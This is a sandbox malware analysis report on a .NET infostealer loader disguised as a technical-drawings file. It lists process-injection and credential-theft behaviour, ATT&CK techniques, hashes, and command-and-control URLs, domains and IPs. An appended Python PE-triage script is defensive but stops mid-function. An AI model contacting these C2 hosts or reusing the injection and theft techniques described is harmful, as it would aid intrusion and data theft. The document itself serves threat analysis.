Source: Yara match | File source: 00000004.00000000.260249710.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.333361957.000000000B546000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.265706280.00000000039FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Shared Modules (1) | Path Interception | Process Injection (612) | Masquerading (1) | OS Credential Dumping (1) | Security Software Discovery (121) | Remote Services | Email Collection (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (2) | Remote Desktop Protocol | Archive Collected Data (11) | Exfiltration Over Bluetooth | Ingress Tool Transfer (3) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (31) | Security Account Manager | Virtualization/Sandbox Evasion (31) | SMB/Windows Admin Shares | Data from Local System (1) | Automated Exfiltration | Non-Application Layer Protocol (4) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection (612) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (114) | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information (11) | LSA Secrets | System Information Discovery (13) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information (3) | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing (13) | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion (1) | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Behavior Graph ID: 680337 | Sample: Technical Specifications & ... | Startdate: 08/08/2022 | Architecture: WINDOWS | Score: 100

• Start: www.fundycases.com; td-balancer-199-15-163-148.wixdns.net; 3 other IPs or domains. Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 8 other signatures
  • Technical Specifications & Drawings.exe (started, 3): dropped Technical Specific... & Drawings.exe.log, ASCII. Signatures: Injects a PE file into a foreign processes
    • Technical Specifications & Drawings.exe (started). Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
      • explorer.exe (injected): www.esandcraic.com 67.223.117.72, 49809, 80 VIMRO-AS15189US United States; tomoptique.fr 109.234.162.62, 49780, 80 O2SWITCHFR France; 8 other IPs or domains. Signatures: System process connects to network (likely due to code injection or exploit)
        • control.exe (started, 13). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Deletes itself after installation; 2 other signatures

Source | Detection | Scanner | Label | Link
Technical Specifications & Drawings.exe | 32% | Virustotal | | Browse
Technical Specifications & Drawings.exe | 22% | ReversingLabs | ByteCode-MSIL.Spyware.Noon |
Technical Specifications & Drawings.exe | 100% | Joe Sandbox ML | |

No Antivirus matches

Source | Detection | Scanner | Label | Link | Download
4.0.Technical Specifications & Drawings.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen | | Download File

Source | Detection | Scanner | Label | Link
boshi-eg.online | 12% | Virustotal | | Browse
mexc-event-partner.site | 6% | Virustotal | | Browse

Source | Detection | Scanner | Label | Link
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe |
http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
http://www.tiro.com | 0% | URL Reputation | safe |
http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ | 100% | Avira URL Cloud | malware |
http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91 | 100% | Avira URL Cloud | malware |
http://www.goodfont.co.kr | 0% | URL Reputation | safe |
http://www.mexc-event-partner.site/02pi/ | 100% | Avira URL Cloud | malware |
http://www.carterandcone.coml | 0% | URL Reputation | safe |
http://www.sajatypeworks.com | 0% | URL Reputation | safe |
http://www.typography.netD | 0% | URL Reputation | safe |
www.tomoptique.fr/02pi/ | 100% | Avira URL Cloud | malware |
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe |
http://fontfabrik.com | 0% | URL Reputation | safe |
http://www.founder.com.cn/cn | 0% | URL Reputation | safe |
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe |
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe |
http://www.sandoll.co.kr | 0% | URL Reputation | safe |
http://www.urwpp.deDPlease | 0% | URL Reputation | safe |
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe |
http://www.sakkal.com | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
boshi-eg.online | 67.23.226.119 | true | true | | unknown
tomoptique.fr | 109.234.162.62 | true | true | | unknown
mexc-event-partner.site | 184.168.107.80 | true | true | | unknown
www.kirchhoff-darryl.com | 107.155.208.43 | true | true | | unknown
www.esandcraic.com | 67.223.117.72 | true | true | | unknown
td-balancer-199-15-163-148.wixdns.net | 199.15.163.148 | true | false | | unknown
www.mexc-event-partner.site | unknown | unknown | true | | unknown
www.fundycases.com | unknown | unknown | true | | unknown
www.gzkanglongkeji.com | unknown | unknown | true | | unknown
www.boshi-eg.online | unknown | unknown | true | | unknown
www.tomoptique.fr | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.kirchhoff-darryl.com/02pi/?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91+KgqpPGSJqKC7J3zS0r1gze3M+2qFZl2NsX2aSbasAE+ZE0SL8u6zgnew==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.tomoptique.fr/02pi/?ZL0=thvfohwi7xD8LUPTC+PvURbDlMdrWv6G+kdQz5W5EjaeNcjaAM/7YzWabXa+Emqnmxa+j2rvyn8aQKdomTvD7NHn7LH6m5q/aw==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.mexc-event-partner.site/02pi/?ZL0=OtaEbXX4ObCoLhtF/lWLZX2dLDLBfFgcjwhWC5AcKk5LEysMwPLPLl+t4RfX0ATi8hGNnWUlfKNR4DoGgewcnJOxYMoo89i/Ow==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.esandcraic.com/02pi/?ZL0=H3j/zDn1cik0H8aEc4JTyOZmy0u09IlpCgxUGgbrjIcqKZuTm1TQkyEN0mTnJzpMGdd8V9PF4iBs4MdYqflf8PDJEP40yO/f8Q==&wRtdp=ETVPg0_ | true | Avira URL Cloud: malware | unknown
http://www.mexc-event-partner.site/02pi/ | true | Avira URL Cloud: malware | unknown
www.tomoptique.fr/02pi/ | true | Avira URL Cloud: malware | low
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.apache.org/licenses/LICENSE-2.0 | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designersG | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fontbureau.com/designers/? | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers? | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.tiro.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.kirchhoff-darryl.com/02pi?ZL0=JO9pwDAFX0pE08ZhB6JsQfIKbq32cMNHUs94bAK91 | control.exe, 00000013.00000002.518695747.0000000004AB2000.00000004.10000000.00040000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.goodfont.co.kr | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.coml | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sajatypeworks.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/cabarga.htmlN | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.founder.com.cn/cn/cThe | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers/frere-jones.html | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.jiyu-kobo.co.jp/ | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/DPlease | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.fontbureau.com/designers8 | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.fonts.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.sandoll.co.kr | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.urwpp.deDPlease | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.zhongyicts.com.cn | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.sakkal.com | Technical Specifications & Drawings.exe, 00000000.00000002.271439563.00000000068F2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
109.234.162.62 | tomoptique.fr | France | 50474 | O2SWITCHFR | true
107.155.208.43 | www.kirchhoff-darryl.com | United States | 4686 | BEKKOAMEBEKKOAMEINTERNETINCJP | true
67.223.117.72 | www.esandcraic.com | United States | 15189 | VIMRO-AS15189US | true
184.168.107.80 | mexc-event-partner.site | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
67.23.226.119 | boshi-eg.online | United States | 33182 | DIMENOCUS | true
                                                IP
                                                192.168.2.1
                                                Joe Sandbox Version:35.0.0 Citrine
                                                Analysis ID:680337
Start date and time: 2022-08-08 12:26:09 +02:00
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 8m 19s
                                                Hypervisor based Inspection enabled:false
                                                Report type:light
                                                Sample file name:Technical Specifications & Drawings.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 29
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • HDC enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@4/2@14/6
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HDC Information:
                                                • Successful, ratio: 93.3% (good quality ratio 81.7%)
                                                • Quality average: 72%
                                                • Quality standard deviation: 33.1%
                                                HCA Information:
                                                • Successful, ratio: 100%
                                                • Number of executed functions: 0
                                                • Number of non-executed functions: 0
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Adjust boot time
                                                • Enable AMSI
                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                                • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
• Not all processes were analyzed; the report is missing behavior information
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
Time | Type | Description
12:27:15 | API Interceptor | 1x Sleep call for process: Technical Specifications & Drawings.exe modified
                                                No context
                                                Process:C:\Users\user\Desktop\Technical Specifications & Drawings.exe
                                                File Type:ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):1308
                                                Entropy (8bit):5.345811588615766
                                                Encrypted:false
                                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84FsXE8:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzu
                                                MD5:2E016B886BDB8389D2DD0867BE55F87B
                                                SHA1:25D28EF2ACBB41764571E06E11BF4C05DD0E2F8B
                                                SHA-256:1D037CF00A8849E6866603297F85D3DABE09535E72EDD2636FB7D0F6C7DA3427
                                                SHA-512:C100729153954328AA2A77EECB2A3CBD03CB7E8E23D736000F890B17AAA50BA87745E30FB9E2B0D61E16DCA45694C79B4CE09B9F4475220BEB38CAEA546CFC2A
                                                Malicious:true
                                                Reputation:high, very likely benign file
                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                Process:C:\Windows\SysWOW64\control.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.792852251086831
                                                Encrypted:false
                                                SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Entropy (8bit):7.774223579181345
                                                TrID:
                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                • DOS Executable Generic (2002/1) 0.01%
                                                File name:Technical Specifications & Drawings.exe
                                                File size:800256
                                                MD5:9b94f751e8cc145058db9f428c2ad571
                                                SHA1:f12af989efe2b3b11e4784899ca4c6794da17879
                                                SHA256:893a0b655917a18e5886348b39f6023fa851cf3d89e5b8709219ad3d2766fa97
                                                SHA512:02660cedcbf7d4a6d075eaa8bbd79bd560fc88ae1bbe5032348240f499432294f9c889b55f96e5f2e4214b7fe838df647a0cf4afefe2778b831af0d7dfd4e3dd
                                                SSDEEP:24576:hFxgV10E4B8aMrhPemfzId4MaZAOzje9IbUDHDl:tgVWES8z04eOzj7U
                                                TLSH:1805BE0BAF147708C5A76AB5EE0BBD76A7F61C5D3135D0B83A617C0A4AFF301E51242A
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@..b..............0..............L... ...`....@.. ....................................@................................
                                                Icon Hash:00828e8e8686b000
                                                Entrypoint:0x4c4cea
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x62F0AC40 [Mon Aug 8 06:25:04 2022 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction (disassembly at the entry point 0x4c4cea)
jmp dword ptr [00402000h]    ; 0x402000 = ImageBase 0x400000 + IAT RVA 0x2000: the native entry stub of a .NET executable, jumping through the IAT to the only import, mscoree.dll!_CorExeMain
add byte ptr [eax], al       ; repeated for the rest of the listing: the bytes after the 6-byte stub are zero padding, and the byte pair 00 00 decodes as add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc4c98 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc6000 | 0x390 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc2cf0 | 0xc2e00 | False | 0.8121780287844772 | data | 7.780783068719605 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc6000 | 0x390 | 0x400 | False | 0.369140625 | data | 2.8640931166907952 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc8000 | 0xc | 0x200 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_VERSION | 0xc6058 | 0x334 | data | |
DLL | Import
mscoree.dll | _CorExeMain
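The static tables above support three checks that a triage script can automate: per-section Shannon entropy (the .text section here scores 7.78, which is what an encrypted payload carried by a .NET loader looks like), presence of the CLR header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR at RVA 0x2008), and whether the native entry point is the 6-byte jmp-through-IAT stub (here jmp dword ptr [00402000h], with the IAT at RVA 0x2000), which means the only native import is mscoree!_CorExeMain. The script below is an added example, not code from the report or from Joe Sandbox. It builds its own PE32 test image with the report's layout scaled down (pseudo-random bytes stand in for the payload; nothing is taken from the malware), parses it with the standard library only, and returns the three findings. The section sizes, the import-directory RVA and the 7.0 entropy threshold are assumptions.

```python
import math
import struct
from collections import Counter
from random import Random

# Data directory indexes from the PE spec, named as in the report's directory table
DIR_IMPORT, DIR_IAT, DIR_COM_DESCRIPTOR = 1, 12, 14


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, the same 8-bit measure the report's section table shows."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def build_sample_pe(seed: int = 1) -> bytes:
    """Constructed PE32 image (not the analysed sample): the report's layout scaled down, IAT at
    RVA 0x2000, CLR header right behind it, and a .text of pseudo-random bytes standing in for
    an encrypted payload. Sizes and the import-directory RVA are assumed values."""
    rng, image_base, ep_off = Random(seed), 0x400000, 0x400
    text = bytearray(rng.randrange(256) for _ in range(0x800))
    # Native entry stub of a .NET exe: FF 25 <absolute address of the IAT slot>
    text[ep_off:ep_off + 6] = b"\xff\x25" + struct.pack("<I", image_base + 0x2000)
    rsrc = b"V\0S\0_\0V\0E\0R\0S\0I\0O\0N\0".ljust(0x200, b"\0")   # low-entropy version resource
    reloc = bytes(0x200)
    dos = b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x62F0AC40, 0, 0, 224, 0x0102)
    dirs = [(0, 0)] * 16
    dirs[DIR_IMPORT], dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (0x2700, 0x4F), (0x2000, 8), (0x2008, 0x48)
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 48, 0, len(text), 0x400, 0, 0x2000 + ep_off, 0x2000, 0x3000,
                      image_base, 0x1000, 0x200, 4, 0, 4, 0, 4, 0, 0, 0x5000, 0x200, 0,
                      2, 0x8540, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)

    def section(name, va, vsize, raw_size, raw_ptr, flags):
        return struct.pack("<8sIIIIIIHHI", name, vsize, va, raw_size, raw_ptr, 0, 0, 0, 0, flags)

    sections = (section(b".text", 0x2000, len(text), len(text), 0x200, 0x60000020)
                + section(b".rsrc", 0x3000, 20, len(rsrc), 0xA00, 0x40000040)
                + section(b".reloc", 0x4000, 0xC, len(reloc), 0xC00, 0x42000040))
    headers = (dos + b"PE\0\0" + coff + opt + sections).ljust(0x200, b"\0")
    return headers + bytes(text) + rsrc + reloc


def parse_pe(blob: bytes) -> dict:
    """Just enough PE32 parsing for triage: entry point, image base, data directories, sections."""
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    opt = e_lfanew + 24                      # IMAGE_OPTIONAL_HEADER follows the 20-byte COFF header
    if blob[:2] != b"MZ" or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    if struct.unpack_from("<H", blob, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    nsections = struct.unpack_from("<H", blob, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", blob, e_lfanew + 20)[0]
    entry_rva = struct.unpack_from("<I", blob, opt + 16)[0]
    image_base = struct.unpack_from("<I", blob, opt + 28)[0]
    ndirs = struct.unpack_from("<I", blob, opt + 92)[0]
    dirs = [struct.unpack_from("<II", blob, opt + 96 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", blob, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw": blob[raw_ptr:raw_ptr + raw_size]})
    return {"entry_rva": entry_rva, "image_base": image_base, "dirs": dirs, "sections": sections}


def read_rva(pe: dict, rva: int, size: int) -> bytes:
    """Translate an RVA to raw file bytes through the section table."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], len(s["raw"])):
            return s["raw"][rva - s["va"]:rva - s["va"] + size]
    return b""


def triage(blob: bytes, packed_threshold: float = 7.0) -> dict:
    """The three static checks the report's section, directory and import tables support."""
    pe = parse_pe(blob)
    entropy = {s["name"]: round(shannon_entropy(s["raw"]), 2) for s in pe["sections"]}
    iat_rva = pe["dirs"][DIR_IAT][0] if len(pe["dirs"]) > DIR_IAT else 0
    clr_size = pe["dirs"][DIR_COM_DESCRIPTOR][1] if len(pe["dirs"]) > DIR_COM_DESCRIPTOR else 0
    stub = read_rva(pe, pe["entry_rva"], 6)
    # FF 25 imm32 is jmp dword ptr [imm32]; a .NET exe jumps through its single IAT slot,
    # which the loader fills with mscoree!_CorExeMain (the report's only import)
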